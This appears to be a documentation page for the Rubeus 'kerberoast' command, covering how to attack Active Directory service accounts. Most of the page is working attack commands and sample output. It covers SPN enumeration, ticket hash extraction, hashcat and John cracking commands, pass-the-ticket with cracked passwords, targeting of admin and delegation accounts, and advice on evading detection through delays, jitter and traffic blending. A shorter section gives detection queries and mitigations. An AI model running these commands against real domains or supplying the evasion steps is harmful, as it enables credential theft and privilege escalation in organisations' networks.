kerberoast

Kerberoasting is one of the most effective post-compromise attacks for escalating privileges in Active Directory environments by targeting service accounts with weak passwords.

Overview

Kerberoasting attacks request service tickets for accounts with Service Principal Names (SPNs) and extract the ticket’s encrypted portion for offline password cracking. This technique exploits the fact that service tickets are encrypted with the target service account’s password hash.

Service Discovery

Identify accounts with Service Principal Names

Ticket Extraction

Request and extract encrypted service tickets

Offline Cracking

Crack extracted hashes with external tools

Attack Methodology

SPN Discovery

Identify service accounts in the domain with registered SPNs

Ticket Request

Request TGS tickets for target service accounts

Hash Extraction

Extract encrypted portion of service tickets

Offline Cracking

Use hashcat or John to crack the extracted hashes

Credential Validation

Test cracked credentials for access and privileges

Syntax Variations

Basic Usage
Advanced Targeting
OPSEC Mode

# Target all service accounts in domain
Rubeus.exe kerberoast

# Target admin service accounts
Rubeus.exe kerberoast /ldapfilter:"admincount=1"

# Target specific OU
Rubeus.exe kerberoast /ou:"OU=Service Accounts,DC=corp,DC=local"

# Use OPSEC features
Rubeus.exe kerberoast /opsec

# Specific encryption and delays
Rubeus.exe kerberoast /opsec /delay:5000 /jitter:30

Targeting Parameters

Hide Service Targeting

spn

string

Target specific Service Principal Name

spns

string

File containing list of SPNs to target

Show File Format

One SPN per line:

MSSQLSvc/sql01.corp.local:1433
HTTP/web01.corp.local
CIFS/fileserver.corp.local

user

string

Target specific username with SPNs

users

string

File containing list of usernames to target

Show LDAP Filtering

ldapfilter

string

Custom LDAP filter for advanced targeting

Show Common Filters

admincount=1 - Administrative accounts
serviceprincipalname=* - Any account with SPNs
samaccountname=svc_* - Service accounts by naming pattern
useraccountcontrol:1.2.840.113556.1.4.803:=512 - Normal accounts only

string

Target specific Organizational Unit

domain

string

Target domain (default: current domain)

string

Specific domain controller to query

Show Output Options

format

string

Hash output format for cracking tools

Show Supported Formats

hashcat (default) - Hashcat mode 13100
john - John the Ripper format

outfile

string

Save extracted hashes to file

nowrap

boolean

Don’t wrap long lines in output

simple

boolean

Output only the crackable hash portion

Show OPSEC Options

opsec

boolean

Enable OPSEC-safe features

delay

number

Delay in milliseconds between requests

jitter

number

Random percentage variation in delay (0-100)

aes

boolean

Request AES256 encryption (less common, more suspicious)

Show Advanced Options

stats

boolean

Display statistics about service accounts

resultlimit

number

Limit number of results returned

pwdsetafter

string

Only target accounts with passwords set after date

pwdsetbefore

string

Only target accounts with passwords set before date

Response Format

Successful Extraction
No Results
Error Scenarios

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target SPN             : MSSQLSvc/sql01.corp.local:1433
[*] Target Name            : svc_sql
[*] Target Domain          : CORP.LOCAL
[*] Searching path 'LDAP://DC=corp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(userAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 15

[*] SamAccountName         : svc_sql
[*] DistinguishedName      : CN=SQL Service,OU=Service Accounts,DC=corp,DC=local
[*] ServicePrincipalName   : MSSQLSvc/sql01.corp.local:1433
[*] PwdLastSet             : 1/15/2024 2:15:30 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$hash_data_here

Target Information

object

Details about the targeted service account

Show Fields

SamAccountName: Username of service account
ServicePrincipalName: The targeted SPN
PwdLastSet: When password was last changed
Supported ETypes: Encryption types supported

Hash

string

Extracted hash in specified format for cracking

Statistics

object

Summary information about the operation

Show Metrics

Total kerberoastable users: Number of accounts with SPNs
Successful extractions: Hashes successfully extracted
Failed requests: Services that couldn’t be accessed

[*] Action: Kerberoasting

[*] Target SPN             : MSSQLSvc/sql01.corp.local:1433
[*] Searching path 'LDAP://DC=corp,DC=local' for '(&(samAccountType=805306368)(servicePrincipalName=*))'

[!] No users found to Kerberoast!

Common reasons for no results:

No service accounts with SPNs in target domain
Insufficient permissions to query LDAP
Target-specific filters too restrictive
Service accounts don’t allow TGS requests

[!] LDAP query failed!
System.DirectoryServices.DirectoryServiceCOMException: The server is not operational.

Common error scenarios:

LDAP query failed: Domain controller unreachable
Access denied: Insufficient permissions for LDAP queries
No current user context: Need valid domain authentication
Clock skew: Time synchronization issues

Hash Format Examples

Hashcat Format
John Format
AES Hashes

$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$a1b2c3d4e5f6...

Format Components

object

Breakdown of hashcat format structure

Show Structure

$krb5tgs$ - Kerberos TGS identifier
23 - Encryption type (RC4-HMAC)
*svc_sql$CORP.LOCAL$ - Username and domain
MSSQLSvc/sql01.corp.local:1433* - Service principal name
$hash_data - Encrypted ticket portion for cracking

Cracking Command:

hashcat -m 13100 kerberoast_hashes.txt /usr/share/wordlists/rockyou.txt

svc_sql:$krb5tgs$23$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$a1b2c3d4e5f6...

John Format

string

Username prefix with colon-separated hash

Cracking Command:

john --format=krb5tgs kerberoast_hashes.txt --wordlist=/usr/share/wordlists/rockyou.txt

$krb5tgs$18$*svc_sql$CORP.LOCAL$MSSQLSvc/sql01.corp.local:1433*$a1b2c3d4e5f6...

AES-encrypted hashes (type 18) are significantly harder to crack than RC4 hashes (type 23) and may not be practical for offline attacks.

Hashcat AES Support:

hashcat -m 19600 aes_hashes.txt wordlist.txt  # AES128
hashcat -m 19700 aes_hashes.txt wordlist.txt  # AES256

Complete Attack Workflow

Initial Reconnaissance

Discover service accounts and assess the target environment:

# Get statistics about service accounts
Rubeus.exe kerberoast /stats

# Target administrative service accounts
Rubeus.exe kerberoast /ldapfilter:"admincount=1" /stats

OPSEC-Safe Extraction

Perform the actual kerberoasting with stealth considerations:

# OPSEC-safe kerberoasting with delays
Rubeus.exe kerberoast /opsec /delay:5000 /jitter:30 /outfile:hashes.txt

# Target specific high-value accounts
Rubeus.exe kerberoast /user:svc_sql /opsec /format:hashcat

Hash Processing

Prepare hashes for cracking with external tools:

# Extract hashes to file
Rubeus.exe kerberoast /outfile:hashcat_hashes.txt /format:hashcat /nowrap

# Verify hash format
head -n 5 hashcat_hashes.txt

Offline Cracking

Use hashcat or John the Ripper to crack the extracted hashes:

# Basic dictionary attack
hashcat -m 13100 hashcat_hashes.txt /usr/share/wordlists/rockyou.txt

# Advanced rule-based attack
hashcat -m 13100 hashcat_hashes.txt wordlist.txt -r rules/best64.rule

# Mask attack for corporate passwords
hashcat -m 13100 hashcat_hashes.txt -a 3 ?u?l?l?l?l?l?d?d?d?s

Credential Validation

Test cracked credentials for access and privileges:

# Test cracked service account
Rubeus.exe asktgt /user:svc_sql /password:CrackedPassword123! /ptt

# Enumerate accessible services
Rubeus.exe asktgs /service:cifs/fileserver.corp.local

Advanced Targeting Strategies

High-Value Targets
Password Age Targeting
Organizational Targeting

Show Administrative Service Accounts

# Accounts with administrative privileges
Rubeus.exe kerberoast /ldapfilter:"admincount=1"

# Accounts in privileged groups
Rubeus.exe kerberoast /ldapfilter:"memberof=CN=Domain Admins,CN=Users,DC=corp,DC=local"

Show Delegation-Enabled Accounts

# Constrained delegation accounts
Rubeus.exe kerberoast /ldapfilter:"msds-allowedtodelegateto=*"

# Unconstrained delegation (high value)
Rubeus.exe kerberoast /ldapfilter:"useraccountcontrol:1.2.840.113556.1.4.803:=524288"

Show Service-Specific Targeting

# SQL Server service accounts
Rubeus.exe kerberoast /ldapfilter:"serviceprincipalname=MSSQLSvc*"

# Exchange service accounts
Rubeus.exe kerberoast /ldapfilter:"serviceprincipalname=exchangeMDB*"

# IIS/Web service accounts
Rubeus.exe kerberoast /ldapfilter:"serviceprincipalname=HTTP*"

Show Old Passwords

# Passwords not changed in 2+ years (likely weak)
Rubeus.exe kerberoast /pwdsetbefore:"01/01/2022"

# Service accounts with old passwords
Rubeus.exe kerberoast /ldapfilter:"samaccountname=svc_*" /pwdsetbefore:"01/01/2023"

Show Recently Changed

# Recently changed passwords (may follow patterns)
Rubeus.exe kerberoast /pwdsetafter:"01/01/2024"

# Accounts changed in specific time window
Rubeus.exe kerberoast /pwdsetafter:"06/01/2024" /pwdsetbefore:"08/01/2024"

Show Specific OUs

# Service accounts OU
Rubeus.exe kerberoast /ou:"OU=Service Accounts,DC=corp,DC=local"

# Application-specific OUs
Rubeus.exe kerberoast /ou:"OU=SQL Services,OU=Applications,DC=corp,DC=local"

Show Cross-Domain

# Target child domain
Rubeus.exe kerberoast /domain:child.corp.local

# Target specific domain controller
Rubeus.exe kerberoast /domain:corp.local /dc:dc01.corp.local

OPSEC Considerations

Detection Risk: Kerberoasting generates TGS requests that can be monitored by security tools and may appear in domain controller logs.

Detection Vectors
Evasion Techniques
Defensive Countermeasures

Hide Domain Controller Logs

Event ID 4769 - Kerberos TGS Request:

High volume of TGS requests from single source
Requests for service accounts not typically accessed
RC4 encryption requests in AES-only environments
Requests for administrative service accounts

Show Network Monitoring

Unusual Kerberos traffic patterns
High frequency of TGS requests
Traffic to domain controllers from non-standard sources
LDAP queries for service principal names

Show Host-Based Detection

Processes making unusual Kerberos API calls
Memory access patterns consistent with ticket extraction
File creation in temp directories (hash output files)
Execution of password cracking tools

Hide Timing and Volume

# Implement delays between requests
Rubeus.exe kerberoast /delay:10000 /jitter:50

# Limit targeting to reduce noise
Rubeus.exe kerberoast /user:specific_target /opsec

# Spread operations over time
Rubeus.exe kerberoast /resultlimit:5 /delay:30000

Show Request Patterns

# Use legitimate business hours
# Schedule operations during 9-5 business hours

# Mimic normal authentication patterns
# Space requests to appear like normal service access

# Target during high activity periods
# Blend with legitimate authentication traffic

Show Technical Evasion

# Force AES encryption (less suspicious in modern environments)
Rubeus.exe kerberoast /aes

# Use specific domain controllers
Rubeus.exe kerberoast /dc:dc02.corp.local

# Limit LDAP queries
Rubeus.exe kerberoast /spn:"MSSQLSvc/sql01.corp.local:1433"

Show Detection Rules

SIEM Queries for Kerberoasting:

-- High volume TGS requests
SELECT * FROM events
WHERE event_id = 4769
GROUP BY source_ip
HAVING COUNT(*) > 50
WITHIN 1 HOUR

-- RC4 requests for service accounts
SELECT * FROM events
WHERE event_id = 4769
AND encryption_type = 'RC4'
AND service_name LIKE 'svc_%'

Show Mitigation Strategies

Organizational Controls:

Strong password policies for service accounts
Regular password rotation schedules
Managed Service Accounts (MSAs) where possible
Least privilege access for service accounts

Technical Controls:

Enable AES encryption for Kerberos
Monitor TGS request patterns
Implement service account monitoring
Use Group Managed Service Accounts (gMSAs)

Troubleshooting

Show Common Issues

No Results
Access Denied
Cracking Issues

Problem: No kerberoastable users foundSolutions:

Verify LDAP connectivity to domain controllers
Check user permissions for LDAP queries
Confirm service accounts exist with SPNs
Try broader LDAP filters

# Test LDAP connectivity
Rubeus.exe kerberoast /stats

# Try different targeting
Rubeus.exe kerberoast /ldapfilter:"serviceprincipalname=*"

Problem: Insufficient permissions for operationsSolutions:

Ensure valid domain authentication
Check if account has LDAP query permissions
Verify domain controller accessibility
Try different domain controllers

# Test with specific DC
Rubeus.exe kerberoast /dc:dc01.corp.local

# Verify current authentication
Rubeus.exe klist

Problem: Unable to crack extracted hashesSolutions:

Verify hash format compatibility
Try different wordlists and rules
Consider password complexity requirements
Use appropriate hashcat modes

# Verify hash format
head -n 1 hashes.txt

# Try different attack modes
hashcat -m 13100 hashes.txt --show  # Show any already cracked

Integration with Other Tools

BloodHound Integration

Use BloodHound to identify high-value service accounts before kerberoasting

Hashcat/John

Process extracted hashes with dedicated password cracking tools

Impacket Integration

Use GetUserSPNs.py for alternative SPN enumeration and targeting

PowerView Integration

Combine with PowerView for enhanced Active Directory reconnaissance

asreproast

Alternative credential attack for accounts without pre-auth

asktgt

Use cracked credentials to request TGTs

s4u

Abuse service accounts with delegation rights

silver

Create silver tickets with compromised service accounts

Getting Started

Ticket Operations

Attack Techniques

Miscellaneous

Overview

Service Discovery

Ticket Extraction

Offline Cracking

Attack Methodology

Syntax Variations

Targeting Parameters

Response Format

Hash Format Examples

Complete Attack Workflow

Advanced Targeting Strategies

OPSEC Considerations

Troubleshooting

Integration with Other Tools

BloodHound Integration

Hashcat/John

Impacket Integration

PowerView Integration

asreproast

asktgt

s4u

silver

Getting Started

Ticket Operations

Attack Techniques

Miscellaneous

​Overview

Service Discovery

Ticket Extraction

Offline Cracking

​Attack Methodology

​Syntax Variations

​Targeting Parameters

​Response Format

​Hash Format Examples

​Complete Attack Workflow

​Advanced Targeting Strategies

​OPSEC Considerations

​Troubleshooting

​Integration with Other Tools

BloodHound Integration

Hashcat/John

Impacket Integration

PowerView Integration

​Related Commands

asreproast

asktgt

s4u

silver

Overview

Attack Methodology

Syntax Variations

Targeting Parameters

Response Format

Hash Format Examples

Complete Attack Workflow

Advanced Targeting Strategies

OPSEC Considerations

Troubleshooting

Integration with Other Tools

Related Commands